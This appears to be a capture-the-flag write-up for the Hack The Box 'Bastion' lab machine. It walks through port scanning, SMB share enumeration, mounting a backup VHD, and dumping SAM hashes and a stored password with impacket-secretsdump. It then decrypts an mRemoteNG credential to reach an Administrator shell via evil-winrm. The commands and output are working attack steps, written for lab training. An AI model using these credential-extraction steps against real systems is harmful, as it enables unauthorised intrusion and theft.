Enum

Nmap

# Nmap 7.80 scan initiated Wed May 26 12:59:43 2021 as: nmap -sCV -p- -oN enum/nmap 10.10.10.134
Nmap scan report for 10.10.10.134
Host is up (0.046s latency).
Not shown: 65522 closed ports
PORT      STATE SERVICE      VERSION
22/tcp    open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -39m58s, deviation: 1h09m15s, median: 0s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-05-26T19:01:17+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-05-26T17:01:16
|_  start_date: 2021-05-26T16:55:07

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 26 13:01:23 2021 -- 1 IP address (1 host up) scanned in 100.10 seconds

SMB

──(bob㉿kali)-[~/htb/bastion]
└─$ smbclient -L \\10.10.10.134                                                                                                                               1 ⨯
Enter WORKGROUP\bob's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        Backups         Disk      
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
SMB1 disabled -- no workgroup available

User

We discover that there is .vhd images located in the Backup folder. From this blogpost we learn that we can extract the password hash by mounting the vhd.

guestmount --add 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro -v /mnt/vhd

After copying over SECURITY SAM and SYSTEM from /vhd/mnt/Windows/System32/config locally we can extract the hashes by running

┌──(bob㉿kali)-[~/htb/bastion]
└─$ impacket-secretsdump -system SYSTEM -sam SAM -security SECURITY local 
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword 
(Unknown User):bureaulampje
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x32764bdcb45f472159af59f1dc287fd1920016a6
dpapi_userkey:0xd2e02883757da99914e3138496705b223e9d03dd
[*] Cleaning up...

Lets try if the password works with L4mpje L4mpje:bureaulampje

┌──(bob㉿kali)-[~/htb/bastion]
└─$ crackmapexec smb 10.10.10.134 -u L4mpje -p bureaulampje
SMB         10.10.10.134    445    BASTION          [*] Windows Server 2016 Standard 14393 x64 (name:BASTION) (domain:Bastion) (signing:False) (SMBv1:True)
SMB         10.10.10.134    445    BASTION          [+] Bastion\bureaulampje:L4mpje

The credentials do not work via WinRM but they do work via ssh.

l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt                                                                                                              
9bfe57d5c3309db3a151772f9d86c6cd

Privilege Escalation

Running Seatbelt.exe we can see some installed software which is not common

Following the steps in this post we clone https://github.com/kmahyyg/mremoteng-decrypt and use the base64 encoded string from confCons.xml

┌──(bob㉿kali)-[~/htb/bastion/mremoteng-decrypt]
└─$ python3 mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==                                130 ⨯
Password: thXLHM96BeKL0ER2

With the decrypted password we get access as Administrator.

┌──(bob㉿kali)-[~/htb/bastion/mremoteng-decrypt]
└─$ evil-winrm -i 10.10.10.134 -u Administrator -p thXLHM96BeKL0ER2          

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>